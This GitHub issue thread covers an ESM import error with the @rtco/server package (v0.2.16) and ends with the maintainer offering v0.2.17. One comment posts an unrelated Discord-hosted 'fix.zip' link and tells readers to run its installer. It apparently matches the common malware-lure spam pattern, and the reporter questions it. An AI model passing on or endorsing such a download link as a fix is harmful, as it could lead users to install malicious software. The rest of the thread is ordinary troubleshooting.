### ISSUE TITLE
Can't run ArticoServer in mjs file.

### ISSUE THREAD

**Issue by stephenprogramscoffee** [matallui/artico#22]
I am creating a node server that runs ArticoServer in mjs file. When I execute the command `node <server-file.mjs>` in Putty, I run into an error.

```
import { ArticoServer } from "@rtco/server";
         ^^^^^^^^^^^^
SyntaxError: Named export 'ArticoServer' not found. The requested module '@rtco/server' is a CommonJS module, which may not support all module.exports as named exports.
CommonJS modules can always be imported via the default export, for example using:

import pkg from '@rtco/server';
const { ArticoServer } = pkg;

    at ModuleJob._instantiate (node:internal/modules/esm/module_job:134:21)
    at async ModuleJob.run (node:internal/modules/esm/module_job:217:5)
    at async ModuleLoader.import (node:internal/modules/esm/loader:316:24)
    at async asyncRunEntryPointWithESMLoader (node:internal/modules/run_main:123:5)

Node.js v20.14.0
```

I tried adding this line to my package.json `"type": "module"`, but I am getting new error.

**Current @rtco/server Version**:
- v0.2.16

**Node Version**:
- Version 20.14.0

**Terminal**:
- Putty

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by stephenprogramscoffee** [comment]
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

How is this a solution?

**Comment by stephenprogramscoffee** [comment]
I downgrade to v0.2.12, now it is running expectedly. It seems like v0.2.16 is the problem. Hope this issue be solved.

**Comment by matallui** [comment]
@stephenprogramscoffee thanks for reporting the problem! I'll take a look and fix this as soon as I find some free time.

**Comment by matallui** [comment]
@stephenprogramscoffee Can you give v0.2.17 a try? Let me know if that fixes the issues. Thanks!
